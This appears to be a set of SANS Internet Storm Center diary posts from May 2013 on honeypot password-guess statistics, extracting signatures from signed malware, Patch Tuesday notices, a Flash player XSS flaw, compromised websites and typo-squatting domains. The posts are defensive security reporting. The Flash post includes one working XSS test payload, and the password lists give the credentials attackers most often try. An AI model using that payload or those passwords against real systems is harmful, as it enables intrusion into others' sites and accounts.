123456 = 167854 (1.09%)
password = 113640 (0.74%)
cacutza = 99492 (0.65%)
__--_-__-_ = 79153 (0.51%)
123 = 63557 (0.41%)
root = 61560 (0.4%)
1234 = 58103 (0.38%)
123456789 = 57270 (0.37%)
12345 = 53445 (0.35%)
test = 52231 (0.34%)

Okay, the first thing to note, is that the default password for kippo is 123456, so that may skew the above a bit.  The one I personally find most interesting is the 4th one, '__--_-__-_'.

Top 10 base words
password = 295354 (1.92%)
test = 192825 (1.25%)
pass = 127086 (0.82%)
root = 121704 (0.79%)
cacutza = 99492 (0.65%)
temp = 97145 (0.63%)
p@ssw0rd = 92650 (0.6%)
p4ssword = 88344 (0.57%)
changeme = 74842 (0.49%)
p4ssw0rd = 74329 (0.48%)

So, some variation on password (with or without substitutions).

Password length (count ordered)
6 = 2708563 (17.57%)
8 = 2275062 (14.76%)
7 = 1550776 (10.06%)
9 = 1394644 (9.05%)
10 = 1234997 (8.01%)
4 = 1143617 (7.42%)
5 = 1025693 (6.65%)
12 = 766462 (4.97%)
11 = 647696 (4.2%)
3 = 437702 (2.84%)

The password guesses varied in length from 1 (do people actually allow 1 character passwords?) to 70 characters in length.  The longest ones being shown below

56 = 4504 (0.03%)
57 = 180 (0.0%)
58 = 465 (0.0%)
60 = 17 (0.0%)
62 = 800 (0.01%)
63 = 69 (0.0%)
64 = 369 (0.0%)
70 = 9 (0.0%)
71 = 908 (0.01%)

The mix

One to six characters = 5463941 (35.44%)
One to eight characters = 9289779 (60.26%)
More than eight characters = 6125535 (39.74%)

Only lowercase alpha = 5126974 (33.26%)
Only uppercase alpha = 140773 (0.91%)
Only alpha = 5267747 (34.17%)
Only numeric = 1906165 (12.37%)

First capital last symbol = 135964 (0.88%)
First capital last number = 958843 (6.22%)

One to six characters = 5463941 (35.44%)
One to eight characters = 9289779 (60.26%)
More than eight characters = 6125535 (39.74%)

Only lowercase alpha = 5126974 (33.26%)
Only uppercase alpha = 140773 (0.91%)
Only alpha = 5267747 (34.17%)
Only numeric = 1906165 (12.37%)

First capital last symbol = 135964 (0.88%)
First capital last number = 958843 (6.22%)

Last digit
3 = 1621502 (10.52%)
1 = 1394507 (9.05%)
0 = 620126 (4.02%)
4 = 593100 (3.85%)
6 = 548727 (3.56%)
2 = 478758 (3.11%)
5 = 420699 (2.73%)
9 = 407320 (2.64%)
8 = 318715 (2.07%)
7 = 303304 (1.97%)

Last 3 digits (Top 10)
123 = 1156095 (7.5%)
456 = 380369 (2.47%)
234 = 340074 (2.21%)
345 = 234638 (1.52%)
321 = 212258 (1.38%)
789 = 192424 (1.25%)
678 = 166984 (1.08%)
567 = 154030 (1.0%)
001 = 146204 (0.95%)
111 = 91160 (0.59%)

Character sets
loweralpha: 5126974 (33.26%)
loweralphanum: 4803721 (31.16%)
numeric: 1906165 (12.37%)
loweralphaspecialnum: 803707 (5.21%)
mixedalphanum: 768137 (4.98%)
mixedalphaspecialnum: 641067 (4.16%)
loweralphaspecial: 344881 (2.24%)
upperalphanum: 181283 (1.18%)
mixedalpha: 151523 (0.98%)
special: 149786 (0.97%)
upperalpha: 140773 (0.91%)
upperalphaspecialnum: 133340 (0.86%)
mixedalphaspecial: 91536 (0.59%)
upperalphaspecial: 81044 (0.53%)
specialnum: 66165 (0.43%)

Character set ordering
allstring: 5419270 (35.16%)
othermask: 3833967 (24.87%)
stringdigit: 2622232 (17.01%)
alldigit: 1906165 (12.37%)
stringdigitstring: 478523 (3.1%)
digitstring: 446101 (2.89%)
stringspecial: 184687 (1.2%)
allspecial: 149786 (0.97%)
stringspecialstring: 117368 (0.76%)
digitstringdigit: 114141 (0.74%)
stringspecialdigit: 101918 (0.66%)
specialstring: 25205 (0.16%)
specialstringspecial: 15951 (0.1%)


Some final thoughts

Okay, there is some interesting stuff there and if you are interested in the pieces of the standard pipal report that I didn't include there, I've put the full report up on my handler page.  One of the other thing I took a look at was how many in the mix satisfy the standard definition of a "complex" password [lower case, upper case, digits, special characters] (choose 3) and length >= 8.  620413 (4.02%) of the passwords satisfy this definition of complex.  However, when you look at unique passwords, only 1286 (2.75% of the 46840 unique ones) are complex.  So, at least one takeaway is that the more complex you make your crucial passwords the less likely you are to fall victim to this type of password guessing attack.  Of course, 173 of those 1286 were some variation on 'password' with subsitutions or digits and/or special characters tacked on the end.  So, what do you think?  Is there some other aspect of the passwords that I should have looked at?  Let us know in the comment section below or via our contact form.

Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

The opinions expressed here are strictly those of the author and do not necessarily represent those of SANS, the Internet Storm Center, the author's spouse, kids, or pets (except maybe the ornery cat).


Published: 2013-05-11

Extracting Digital Signatures from Signed Malware

Sometimes attackers digitally sign their malicious software. Examining properties of the signature helps malware analysts understand the context of the incident. Moreover, analysts could use the signature as an indicator of compromise. Here are some tips and tools for determining whether a suspicious Windows executable has been signed and for extracting the embedded signature in a Linux environment. We'll look at Pyew, Disitool and get a bit of help from OpenSSL.

Microsoft's Windows Authenticode Portable Executable Signature Format document explains that the signatures can be embedded "in a Windows PE file, in a location specified by the Certificate Table entry in Optional Header Data Directories." The location of the signature is stored within the PE header's OptionalHeader structure's Security field.

One way to determine whether the file contains an embedded signature is to use Pyew, which is a command-line hex editor/disassembler for malware analysis. After loading the sample into Pyew, you can look at the size of the IMAGE_DIRECTORY_ENTRY_SECURITY field. A non-zero value indicates that the file probably includes an embedded signature.To do this, load the PE file into Pyew and enter the command "pyew.pe.OPTIONAL_HEADER.DATA_DIRECTORY". Then look at the size of IMAGE_DIRECTORY_ENTRY_SECURITY as shown below:

Pyew Signature Header

In the Pyew output above, we see that the size of IMAGE_DIRECTORY_ENTRY_SECURITY is non-zero. This indicates that kiwi.exe probably includes an embedded signature.

Disitool provides another way of determining whether a PE file includes a signature. This tool, created by Didier Stevens, can delete, copy, extract and add signatures. If you attempt to extract a signature from a non-signed file, Disitool will tell you "source file not signed."

In the example below, we see that the file has been signed. The author of this malicious file seems to have used a stolen certificate to sign the specimen. Disitool's "extract" command pulled out the signature, so we can examine it.

Disitool Extract Signature

Disitool saves the extracted certificate in the binary DER format. You can look at the strings embedded in the DER file to examine its contents. Even better, you can use the following OpenSSL command to convert the DER file into a more informative text file:

openssl pkcs7 -inform DER -print_certs -text -in INPUT_FILE > OUT_FILE

Knowing how to spot signed files and extract signature details can be helpful for malware and forensic analysts. On Windows, you can gather some of these details by right-clicking on the PE file and looking at its properties, as well as with the help of Microsoft's Sign Tool and Sigcheck tools. On Linux, you can accomplish this with the help of Pyew, Disitool and OpenSSL, which are installed on REMnux for your convenience.


-- Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers' IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter and . He also writes a security blog.


Published: 2013-05-10

Microsoft and Adobe Patch Tuesday Pre-Release

Both Adobe and Microsoft released pre-anouncements for next week's patch Tuesday.

Microsoft is working on having a patch available for the Internet Explorer 8 0-day vulnerability. [1] There are two critical Internet Explorer patches, one specifically for Internet Explorer 8, and the other one for all current versions. The later (refered to as "Bulletin 1" by Microsoft) is likely the usual roll up patch. 

There are the only two critical bulletins next week. The rest covers "the usual" (Office, Windows, Lynx and Windows Essentials) and is rated important.

Adobe announced only one bulletin for Acrobat and PDF Reader. There is no patch scheduled for Cold Fusion at this point.

[1] http://blogs.technet.com/b/msrc/archive/2013/05/09/advance-notification-service-for-the-may-2013-security-bulletin-release.aspx
[2] http://technet.microsoft.com/en-us/security/bulletin/ms13-may
[3] http://www.adobe.com/support/security/bulletins/apsb13-15.html



Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-05-08

"De Flashing" the ISC Web Site and Flash XSS issues

You may have noticed that earlier today, I removed the flash player that we use to play audio files on our site. The trigger for this was a report that the particular flash player we use (an open source player usually used with Wordpress) is suscepible to cross site scripting [1][2]. Instead of upgrading to the newer (patched) version, we instead decided to remove the player. 

The other part of this is that pretty much all current browsers do have reasonable support for HTML 5 audio tags. We do offer our audio files, like the daily podcast, in MP3 as well as Ogg Vorbis format, which covers all major browsers. We also offer links to the direct files in case someone would like to play the files "offline" and we do offer via RSS feeds various MP3/Podcast players. 

So in short, the flash player wasn't worth maintaining. 

On the other hand, we will try to embrace some of the HTML5 features more as we move the site forward. The data will still be available in pretty much any browser (yup. ... lynx), but you will see our graphs and similar parts of the site take advantage of newer browser features to make it easier to navigate the data. For now, we still got a couple of flash movies on the site, but we are working on moving them either to youtube, or using our own (again HTML5 based) solution.

Big thanks to Rafay Baloch [3] for reporting the XSS vulnerability to us! 

Example exploit string to test your own player: player.swf ? playerID= \\%22))} catch(e){alert('Your%20cookies%20are%20mine%20now')} //    (remove spaces, but keep the // at the end)

[1] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1464
[2] http://wordpress.org/extend/plugins/audio-player/
[3] http://rafayhackingarticles.net twitter @rafaybaloch

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-05-08

Syria drops from Internet 7th May 2013

There's been a number of reports that Internet connectivity to Syria has been broken or disabled and there is no official word on what has caused this.

Google's Transparency Report page [1] displays the drop off and a more comprehensive report is on Umbrella labs blog [2]



[1]  http://www.google.com/transparencyreport/traffic/#expand=SY

[2] http://labs.umbrella.com/2013/05/07/breaking-news-traffic-from-syria-disappears-from-internet/   



Chris Mohan --- Internet Storm Center Handler on Duty


Published: 2013-05-08

Are there any websites that are NOT compromised?

Today was yet another day with lots of compromised websites, some notable others less.

This morning, a reader wrote in to notify us that the county government website of a county in Georgia was compromised. Sure enough, it appeared to serve malicious javascript, launching the usual exploit kit Java exploit (zeroaccess was the readers guess, and I think he was right). With smaller sites/organizations like this, I usually try to give them a call, and in this case, was pretty quickly sent to a person who was responsible for the web site content. Sadly, I don't think this person had any basic understanding of exploit kits or web applications to understand most of what I tried to explain, but she knew someone to contact. As of right now, the web site *appears* to be "clean". Which gets me to the next point, some of the difficulties one encounters in notifying sites:

- Frequently, like in this case, the exploit only shows up on some pages, and not all the time. Sometimes you need to visit with a specific browser, sometimes it is random, or in other cases, the miscreant appears to filter out requests from "administrators" showing them the unaltered site

- It is very hard to NOT get people to go to the URL right away as you talk about it being dangerous. It was relatively early in the morning, and I forgot my usual introduction not to go the site, so sure enough, as I explain which page I noticed as "infected", the person at the phone responded "but it look normal"...

- In particular for small sites like this, the standard blocklists don't work. Virus Totals URL Scanner showed the site as "safe" . Kaspersky Anti Virus on one of my Mac's flagged the javascript with a generic exploit signature and prevented access.

FWIW: My guess is that the site was infected via the Wordpress plugin "Super Cache" which was installed on the site. This plugin had some recent vulnerabilities.

The other compromisse, that created a larger news response, was the compromise of wtop. com and federalnewsradio. com. Both sides are related to each other, so I consider them one compromise. The interesting response in this case was that the site blocked access from users running Internet Explorer, but let others in to the site. I didn't see any exploit code when I retrieved the site, but I am not sure if it is safe to assume that an exploit is only going to attack one particular browsers, the miscreant appears to filter out requests from "administrators" showing them the unaltered site.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-05-07

Is there an epidemic of typo squatting?

One of our readers, Jim, wrote in earlier today to say he has noticed an increase in "working" typo squatting over the last 2 months or so.  That is, he's seen users accidently surfing to them or being redirected there by some sort of malicious javascript trickery.  His question for us (and the rest of you) is, is this a local phenomenon or are the bad guys making more use of this tactic?  I'm not currently setup to monitor this type of activity, so I figured I'd ask our loyal readers.  Do you monitor your proxy and DNS logs for this type of activity and have you seen an increase?  Leave a comment below or our contact form to let us know.  Below are just a few examples of the domains he has seen.

Bogus domains include:

  • audilble.com
  • boatrader.com
  • charleesschwab.com
  • chsse.com
  • cnnmonet.com
  • dilymail.co.uk
  • loanadminstration.com
  • myunh.com
  • nydailnews.com
  • nydailynew.com
  • nyeater.com
  • nylottory.org


Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu


Published: 2013-05-06

Internet Explorer 8 0-Day Update (CVE-2013-1347)

Thanks to our reader Juha-Matti for pointing out that a Metasploit module was released to exploit the recent Internet Explorer 8 vulnerability. The vulnerability has also been assigned CVE-2013-1347.

Please let us know if you are running into exploits for this vulnerability.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-05-04

The Zero-Day Pendulum Swings

Thanks to some readers Ken and Paul, we've been supplied with some Zero-Day reading.   The best I can skim in short notice on these stories that developed yesterday is that Microsoft is looking into claims of an IE 8 vulnerability. [1]    IE 6,7,9,10 are claimed to be unaffected.

I suggest the pendulum analogy because one article cites a US Government website was hacked [2] by way of a 'watering hole' attack to exploit [3] with what is now believed to be 'zero-day' but was originally thought to be exploited by a slightly modifed version of a well known trojan named 'Poison-Ivy'.[4]

Too many links, too little time.  There is a lot of good reading out there right now, leaving much to review as this issue develops.   So please share your comments and knowledge on this issue with us and our community as it develops.

[1] http://technet.microsoft.com/en-us/security/advisory/2847140
2] http://labs.alienvault.com/labs/index.php/2013/u-s-department-of-labor-website-hacked-and-redirecting-to-malicious-code/
3] http://arstechnica.com/security/2013/05/internet-explorer-zero-day-exploit-targets-nuclear-weapons-researchers/
4] http://www.invincea.com/2013/05/part-2-us-dept-labor-watering-hole-pushing-poison-ivy-via-ie8-zero-day/

ISC Handler on Duty



Published: 2013-05-01

The cost of cleaning up

As Johannes mentions in yesterday's ISC StormCast, the city of Schwerin in Germany apparently decided to throw 170 PCs into the trash, because cleaning them from a Conficker worm infestation was estimated at around 130'000 Euros, whereas the replacement of the old PCs had already been budgeted for at 150'000 Euros. Our recent discussion aside on whether a modern malware infection can actually be "cleaned" or if wiping and reinstallation from scratch is always called for, "the cost of cleaning up" is actually  relevant in either case. Schwerin's 130kEuro estimate amounts to about 1000$ per PC. The report doesn't say if this calculation includes lost productivity of the employee who has to wait for his/her computer to be returned from scrubbing, or if this is just for the cleaning/reinstall itself.

Some Google searches gave me a going rate between 79$ and 299$ for a malware clean-up on a single home user PC, and several of the providers mention explicitly that they offer a "fresh install" for a lower price than the cleanup, which is one more indication that "re-install" seems to become the norm.

My search didn't result in any decent figures for virus cleanup costs in a mid-to-large corporate environment though. Companies of a certain size are likely set up to automatically provision and install new computers, so a replacement/re-stage should be a standard process for them, and relatively quick and cost effective. If you have any figures on the actual cost of cleanup/restage in a larger organization, or know any recent studies that have analyzed this in some depth, please let us know.